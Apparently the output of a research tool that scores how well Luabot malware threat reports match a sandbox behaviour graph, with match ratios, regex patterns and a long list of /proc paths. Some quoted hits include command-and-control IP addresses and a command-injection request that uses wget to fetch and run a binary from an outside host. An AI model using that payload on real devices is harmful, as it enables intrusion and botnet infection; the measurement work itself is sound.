asg_object: ['/dev/urandom', '/proc', '/proc/\\d+/fd', '/proc/net/route', '/proc/net/tcp', '/proc/net/unix', '0x[0-9a-zA-Z]{1,16}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d+', '^PID.*', '^eth.*', 'port \\d+']

Sample Luabot-ibmcloud.csv
	num of segment in report: 27, 1 of them contain ASG object(s)
	lenght of ctd's OPset is 1
	#numofSTobject: 1, numofSTobject sysRrc: 0
	#R_malObj
	num of ctd objects: 4, num of asg objects: 289. R_malObj is 0.0138
		ctd_object: ['\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}']
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 0. R_malSysObj is 0.0000
		len(asg_OPset): 26, len(ctd_OPset): 1
	#R_malOps
	num of matched asg op: 0, num of asg op: 349. R_malOps is 0.0000
		refered lifecycle: []
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 1. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

Sample Luabot-malwaremustdie.csv
	num of segment in report: 173, 25 of them contain ASG object(s)
	lenght of ctd's OPset is 21
	#numofSTobject: 9, numofSTobject sysRrc: 0
	#R_malObj
	num of ctd objects: 11, num of asg objects: 289. R_malObj is 0.0381
		ctd_object: ['/proc', '/proc/net/route', '/proc/net/tcp', '/proc/net/unix', '0x[0-9a-zA-Z]{1,16}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', '^PID.*']
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 0. R_malSysObj is 0.0000
		len(asg_OPset): 26, len(ctd_OPset): 21
	#R_malOps
	num of matched asg op: 8, num of asg op: 349. R_malOps is 0.0229
		refered lifecycle: [0, 1, 2, 13, 17, 19]
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 1. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

	hits
	<OP 1 act=set_tid_address(), obj=0x[0-9a-zA-Z]{1,16} (mem)>, <OP13 act=facebook, obj=0x012b73d0, sent= The malware then run test_domain() lua function to load lookup domains: 0x012b7390  0000 0000 726f 6375 676f 6f67 6c65 2e63  ........google.c 0x012b73a0  6f6d 0034 343a 2063 3100 0000 3100 0000  om.44: c1...1... 0x012b73c0  0000 0000 726d 6973 6661 6365 626f 6f6b  ........facebook 0x012b73d0  2e63 6f6d 0000 0000 3100 0000 3100 0000  .com....1...1... 0x012b73f0  0000 0000 c09e 0200 6261 6964 752e 636f  ........baidu.co 0x012b7410  e073 2b01 0402 0000 c1c4 d41a 0a00 0000  .s+............. 0x012b7420  0000 0000 c8af 2c01 616d 617a 6f6e 2e63  ......,.amazon.c 0x012b7430  6f6d 0001 a076 2b01 c040 2b01 e040 2b01  om...v+..@+..@+>
	<OP 2 act=futex(), obj=0x[0-9a-zA-Z]{1,16} (mem)>, <OP12 act=google.c, obj=0x012b73a0, sent= The malware then run test_domain() lua function to load lookup domains: 0x012b7390  0000 0000 726f 6375 676f 6f67 6c65 2e63  ........google.c 0x012b73a0  6f6d 0034 343a 2063 3100 0000 3100 0000  om.44: c1...1... 0x012b73c0  0000 0000 726d 6973 6661 6365 626f 6f6b  ........facebook 0x012b73d0  2e63 6f6d 0000 0000 3100 0000 3100 0000  .com....1...1... 0x012b73f0  0000 0000 c09e 0200 6261 6964 752e 636f  ........baidu.co 0x012b7410  e073 2b01 0402 0000 c1c4 d41a 0a00 0000  .s+............. 0x012b7420  0000 0000 c8af 2c01 616d 617a 6f6e 2e63  ......,.amazon.c 0x012b7430  6f6d 0001 a076 2b01 c040 2b01 e040 2b01  om...v+..@+..@+>
	<OP 3 act=getpid(), obj=^PID.*>, <OP 9 act=read, obj=PID, sent=Reading all system's active process names & PID in /proc/{PID}/* with utilizing getidents64 to enumerate them, practically it's an approach to see what's running and what values are actually can be fetch, i.e>
	<OP14 act=bind(), obj=ip_addr/ip_addr:port/port>, <OP20 act=lead, obj=185.14.30.214, sent= Which leads to the different IP addresses from:  185.14.30.214 | anna.me>
	<OP18 act=send(), obj=ip_addr/ip_addr:port/port>, <OP18 act=record, obj=217.23.3.47, sent= I recorded this CNC connection session in PCAP with its encrypted form replies from 217.23.3.47 >
	<OP20 act=connect(), obj=ip_addr/ip_addr:port/port>, <OP16 act=connect, obj=217.23.3.47, sent= Next, the malware will connect to the CNC in 217.23.3.47 and send an HTTP/1.1 GET command>

Sample Luabot-microsoft.csv
	num of segment in report: 12, 0 of them contain ASG object(s)
	lenght of ctd's OPset is 0
	#numofSTobject: 0, numofSTobject sysRrc: 0
	#R_malObj
	num of ctd objects: 0, num of asg objects: 289. R_malObj is 0.0000
		ctd_object: []
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 0. R_malSysObj is 0.0000
		len(asg_OPset): 26, len(ctd_OPset): 0
	#R_malOps
	num of matched asg op: 0, num of asg op: 349. R_malOps is 0.0000
		refered lifecycle: []
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 1. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

Sample Luabot-nj.gov.csv
	num of segment in report: 11, 0 of them contain ASG object(s)
	lenght of ctd's OPset is 0
	#numofSTobject: 0, numofSTobject sysRrc: 0
	#R_malObj
	num of ctd objects: 0, num of asg objects: 289. R_malObj is 0.0000
		ctd_object: []
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 0. R_malSysObj is 0.0000
		len(asg_OPset): 26, len(ctd_OPset): 0
	#R_malOps
	num of matched asg op: 0, num of asg op: 349. R_malOps is 0.0000
		refered lifecycle: []
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 1. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

Sample Luabot-securityaffairs.csv
	num of segment in report: 32, 0 of them contain ASG object(s)
	lenght of ctd's OPset is 0
	#numofSTobject: 0, numofSTobject sysRrc: 0
	#R_malObj
	num of ctd objects: 0, num of asg objects: 289. R_malObj is 0.0000
		ctd_object: []
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 0. R_malSysObj is 0.0000
		len(asg_OPset): 26, len(ctd_OPset): 0
	#R_malOps
	num of matched asg op: 0, num of asg op: 349. R_malOps is 0.0000
		refered lifecycle: []
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 1. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

Sample Luabot-softpedia.csv
	num of segment in report: 24, 0 of them contain ASG object(s)
	lenght of ctd's OPset is 0
	#numofSTobject: 0, numofSTobject sysRrc: 0
	#R_malObj
	num of ctd objects: 0, num of asg objects: 289. R_malObj is 0.0000
		ctd_object: []
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 0. R_malSysObj is 0.0000
		len(asg_OPset): 26, len(ctd_OPset): 0
	#R_malOps
	num of matched asg op: 0, num of asg op: 349. R_malOps is 0.0000
		refered lifecycle: []
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 1. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

Sample Luabot-trendmicro.csv
	num of segment in report: 35, 2 of them contain ASG object(s)
	lenght of ctd's OPset is 4
	#numofSTobject: 2, numofSTobject sysRrc: 0
	#R_malObj
	num of ctd objects: 8, num of asg objects: 289. R_malObj is 0.0277
		ctd_object: ['\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d+']
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 0. R_malSysObj is 0.0000
		len(asg_OPset): 26, len(ctd_OPset): 4
	#R_malOps
	num of matched asg op: 4, num of asg op: 349. R_malOps is 0.0115
		refered lifecycle: [13, 14, 17, 18]
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 1. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

	hits
	<OP14 act=bind(), obj=ip_addr/ip_addr:port/port>, <OP 1 act=send, obj=hxxp://192.154.108.2:8080/Arm1;chmod, sent=A remote attacker sends this request to random IP addresses and attempts to take advantage of the vulnerability:  POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 hxxp://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1>
	<OP15 act=bind(), obj=ip_addr/ip_addr:port/port>, <OP 2 act=send, obj=hxxp://192.154.108.2:8080/Arm1;chmod, sent=A remote attacker sends this request to random IP addresses and attempts to take advantage of the vulnerability:  POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 hxxp://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1>
	<OP18 act=send(), obj=ip_addr/ip_addr:port/port>, <OP 1 act=send, obj=hxxp://192.154.108.2:8080/Arm1;chmod, sent=A remote attacker sends this request to random IP addresses and attempts to take advantage of the vulnerability:  POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 hxxp://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1>
	<OP19 act=send(), obj=ip_addr/ip_addr:port/port>, <OP 2 act=send, obj=hxxp://192.154.108.2:8080/Arm1;chmod, sent=A remote attacker sends this request to random IP addresses and attempts to take advantage of the vulnerability:  POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 hxxp://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1>

Sample Luabot-w00tsec.csv
	num of segment in report: 82, 13 of them contain ASG object(s)
	lenght of ctd's OPset is 12
	#numofSTobject: 8, numofSTobject sysRrc: 0
	#R_malObj
	num of ctd objects: 13, num of asg objects: 289. R_malObj is 0.0450
		ctd_object: ['/dev/urandom', '/proc', '/proc/net/route', '0x[0-9a-zA-Z]{1,16}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d+', '^PID.*']
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 0. R_malSysObj is 0.0000
		len(asg_OPset): 26, len(ctd_OPset): 12
	#R_malOps
	num of matched asg op: 1, num of asg op: 349. R_malOps is 0.0029
		refered lifecycle: [17]
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 1. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

	hits
	<OP18 act=send(), obj=ip_addr/ip_addr:port/port>, <OP 4 act=contact, obj=80.87.205.92, sent=Then the bot will start listening on port 11833 (TCP) and will try to contact the command and control server at 80.87.205.92>


OperationPair that changes system resources:
[<OP22 act=write(), obj=ip_addr/ip_addr:port/port>, <OP23 act=write(), obj=ip_addr/ip_addr:port/port>]

{
    "/dev/urandom": [
        "/dev/urandom"
    ],
    "/proc": [
        "/proc"
    ],
    "/proc/\\d+/fd": [
        "/proc/1/fd",
        "/proc/1/fd/0",
        "/proc/1/fd/1",
        "/proc/1/fd/10",
        "/proc/1/fd/11",
        "/proc/1/fd/12",
        "/proc/1/fd/13",
        "/proc/1/fd/14",
        "/proc/1/fd/2",
        "/proc/1/fd/20",
        "/proc/1/fd/21",
        "/proc/1/fd/22",
        "/proc/1/fd/23",
        "/proc/1/fd/24",
        "/proc/1/fd/25",
        "/proc/1/fd/26",
        "/proc/1/fd/27",
        "/proc/1/fd/28",
        "/proc/1/fd/29",
        "/proc/1/fd/3",
        "/proc/1/fd/30",
        "/proc/1/fd/31",
        "/proc/1/fd/32",
        "/proc/1/fd/33",
        "/proc/1/fd/34",
        "/proc/1/fd/35",
        "/proc/1/fd/36",
        "/proc/1/fd/37",
        "/proc/1/fd/38",
        "/proc/1/fd/39",
        "/proc/1/fd/4",
        "/proc/1/fd/40",
        "/proc/1/fd/42",
        "/proc/1/fd/43",
        "/proc/1/fd/46",
        "/proc/1/fd/47",
        "/proc/1/fd/48",
        "/proc/1/fd/49",
        "/proc/1/fd/5",
        "/proc/1/fd/57",
        "/proc/1/fd/6",
        "/proc/1/fd/7",
        "/proc/1/fd/8",
        "/proc/1/fd/9",
        "/proc/10/fd",
        "/proc/1027/fd",
        "/proc/1077/fd",
        "/proc/1077/fd/0",
        "/proc/1077/fd/1",
        "/proc/1077/fd/10",
        "/proc/1077/fd/11",
        "/proc/1077/fd/12",
        "/proc/1077/fd/13",
        "/proc/1077/fd/14",
        "/proc/1077/fd/15",
        "/proc/1077/fd/16",
        "/proc/1077/fd/17",
        "/proc/1077/fd/18",
        "/proc/1077/fd/19",
        "/proc/1077/fd/2",
        "/proc/1077/fd/20",
        "/proc/1077/fd/21",
        "/proc/1077/fd/23",
        "/proc/1077/fd/24",
        "/proc/1077/fd/25",
        "/proc/1077/fd/26",
        "/proc/1077/fd/3",
        "/proc/1077/fd/4",
        "/proc/1077/fd/5",
        "/proc/1077/fd/6",
        "/proc/1077/fd/7",
        "/proc/1077/fd/8",
        "/proc/1077/fd/9",
        "/proc/1082/fd",
        "/proc/11/fd",
        "/proc/1106/fd",
        "/proc/1106/fd/0",
        "/proc/1106/fd/1",
        "/proc/1106/fd/10",
        "/proc/1106/fd/11",
        "/proc/1106/fd/12",
        "/proc/1106/fd/13",
        "/proc/1106/fd/2",
        "/proc/1106/fd/3",
        "/proc/1106/fd/4",
        "/proc/1106/fd/5",
        "/proc/1106/fd/6",
        "/proc/1106/fd/7",
        "/proc/1106/fd/8",
        "/proc/1106/fd/9",
        "/proc/12/fd",
        "/proc/1258/fd",
        "/proc/1258/fd/0",
        "/proc/1258/fd/1",
        "/proc/1258/fd/10",
        "/proc/1258/fd/11",
        "/proc/1258/fd/12",
        "/proc/1258/fd/13",
        "/proc/1258/fd/2",
        "/proc/1258/fd/3",
        "/proc/1258/fd/4",
        "/proc/1258/fd/5",
        "/proc/1258/fd/6",
        "/proc/1258/fd/7",
        "/proc/1258/fd/8",
        "/proc/1258/fd/9",
        "/proc/1359/fd",
        "/proc/1359/fd/0",
        "/proc/1359/fd/1",
        "/proc/1359/fd/2",
        "/proc/1359/fd/3",
        "/proc/1359/fd/4",
        "/proc/1359/fd/5",
        "/proc/1359/fd/6",
        "/proc/1372/fd",
        "/proc/1372/fd/0",
        "/proc/1372/fd/1",
        "/proc/1372/fd/10",
        "/proc/1372/fd/2",
        "/proc/1376/fd",
        "/proc/1376/fd/0",
        "/proc/1376/fd/1",
        "/proc/1376/fd/2",
        "/proc/1377/fd",
        "/proc/1377/fd/0",
        "/proc/1377/fd/1",
        "/proc/1377/fd/2",
        "/proc/1377/fd/3",
        "/proc/1377/fd/4",
        "/proc/1391/fd",
        "/proc/1391/fd/0",
        "/proc/1391/fd/1",
        "/proc/1391/fd/2",
        "/proc/1393/fd",
        "/proc/1393/fd/0",
        "/proc/1393/fd/1",
        "/proc/1393/fd/2",
        "/proc/1404/fd",
        "/proc/1404/fd/0",
        "/proc/1404/fd/1",
        "/proc/1404/fd/2",
        "/proc/1404/fd/255",
        "/proc/1405/fd",
        "/proc/1405/fd/0",
        "/proc/1405/fd/1",
        "/proc/1405/fd/2",
        "/proc/1405/fd/3",
        "/proc/1407/fd",
        "/proc/1407/fd/0",
        "/proc/1407/fd/1",
        "/proc/1407/fd/10",
        "/proc/1407/fd/11",
        "/proc/1407/fd/12",
        "/proc/1407/fd/2",
        "/proc/1407/fd/3",
        "/proc/1407/fd/4",
        "/proc/1407/fd/5",
        "/proc/1407/fd/6",
        "/proc/1407/fd/7",
        "/proc/1407/fd/8",
        "/proc/1407/fd/9",
        "/proc/1408/fd",
        "/proc/1408/fd/0",
        "/proc/1408/fd/1",
        "/proc/1408/fd/2",
        "/proc/1408/fd/3",
        "/proc/1408/fd/4",
        "/proc/1408/fd/5",
        "/proc/1408/fd/6",
        "/proc/1411/fd",
        "/proc/1411/fd/0",
        "/proc/1411/fd/1",
        "/proc/1411/fd/10",
        "/proc/1411/fd/11",
        "/proc/1411/fd/12",
        "/proc/1411/fd/13",
        "/proc/1411/fd/14",
        "/proc/1411/fd/15",
        "/proc/1411/fd/16",
        "/proc/1411/fd/2",
        "/proc/1411/fd/3",
        "/proc/1411/fd/4",
        "/proc/1411/fd/5",
        "/proc/1411/fd/6",
        "/proc/1411/fd/7",
        "/proc/1411/fd/8",
        "/proc/1411/fd/9",
        "/proc/1422/fd",
        "/proc/1422/fd/0",
        "/proc/1422/fd/1",
        "/proc/1422/fd/10",
        "/proc/1422/fd/11",
        "/proc/1422/fd/12",
        "/proc/1422/fd/13",
        "/proc/1422/fd/14",
        "/proc/1422/fd/15",
        "/proc/1422/fd/16",
        "/proc/1422/fd/17",
        "/proc/1422/fd/18",
        "/proc/1422/fd/2",
        "/proc/1422/fd/20",
        "/proc/1422/fd/21",
        "/proc/1422/fd/22",
        "/proc/1422/fd/3",
        "/proc/1422/fd/4",
        "/proc/1422/fd/5",
        "/proc/1422/fd/6",
        "/proc/1422/fd/7",
        "/proc/1422/fd/8",
        "/proc/1422/fd/9",
        "/proc/1423/fd",
        "/proc/1423/fd/0",
        "/proc/1423/fd/1",
        "/proc/1423/fd/2",
        "/proc/1423/fd/3",
        "/proc/1423/fd/4",
        "/proc/1423/fd/5",
        "/proc/1423/fd/6",
        "/proc/1423/fd/7",
        "/proc/1423/fd/8",
        "/proc/1424/fd",
        "/proc/1424/fd/0",
        "/proc/1424/fd/1",
        "/proc/1424/fd/10",
        "/proc/1424/fd/11",
        "/proc/1424/fd/12",
        "/proc/1424/fd/13",
        "/proc/1424/fd/14",
        "/proc/1424/fd/15",
        "/proc/1424/fd/2",
        "/proc/1424/fd/3",
        "/proc/1424/fd/4",
        "/proc/1424/fd/5",
        "/proc/1424/fd/6",
        "/proc/1424/fd/7",
        "/proc/1424/fd/8",
        "/proc/1424/fd/9",
        "/proc/1451/fd",
        "/proc/1451/fd/0",
        "/proc/1451/fd/1",
        "/proc/1451/fd/2",
        "/proc/1451/fd/3",
        "/proc/1451/fd/4",
        "/proc/2/fd",
        "/proc/205/fd",
        "/proc/208/fd",
        "/proc/209/fd",
        "/proc/211/fd",
        "/proc/225/fd",
        "/proc/3/fd",
        "/proc/322/fd",
        "/proc/323/fd",
        "/proc/334/fd",
        "/proc/335/fd",
        "/proc/336/fd",
        "/proc/337/fd",
        "/proc/339/fd",
        "/proc/4/fd",
        "/proc/5/fd",
        "/proc/6/fd",
        "/proc/7/fd",
        "/proc/8/fd",
        "/proc/9/fd",
        "/proc/943/fd",
        "/proc/945/fd",
        "/proc/956/fd",
        "/proc/962/fd",
        "/proc/997/fd"
    ],
    "/proc/net/route": [
        "/proc/net/route"
    ],
    "/proc/net/tcp": [
        "/proc/net/tcp",
        "/proc/net/tcp6"
    ],
    "/proc/net/unix": [
        "/proc/net/unix"
    ]
}